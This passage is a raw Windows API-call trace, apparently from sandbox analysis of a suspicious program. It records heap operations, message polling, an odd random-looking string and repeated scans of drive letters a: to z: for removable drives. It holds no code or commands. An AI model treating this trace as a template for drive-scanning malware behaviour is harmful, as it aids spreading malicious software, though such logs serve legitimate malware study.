lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.333] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.333] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.333] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.333] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.333] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.333] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0218.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0218.334] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0218.334] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.335] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.335] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0218.335] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0218.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.335] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0218.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.336] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.336] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.336] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.336] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.336] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.337] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.337] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.337] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.337] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.337] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.338] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.338] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.338] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.338] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.339] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.339] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.339] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.339] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.339] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.340] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.340] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.340] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.340] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.341] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.341] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.341] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.342] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.343] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.343] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.343] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.343] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.343] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.343] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0218.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0218.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.348] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.348] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.348] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.349] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.349] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.349] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.350] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.350] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.350] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.350] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.350] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.351] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.351] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.352] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.352] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.352] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.352] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.353] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.353] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.353] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.354] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.354] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.354] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.354] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.355] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.355] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.355] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.355] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.356] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.356] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.356] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.357] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.357] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.358] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0218.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0218.359] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0218.359] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.360] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.360] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.360] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.360] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.361] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.361] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.361] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0218.361] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.361] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.363] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.363] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.363] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.363] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.363] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.363] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.364] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.364] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.364] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.364] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.365] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.365] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.365] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 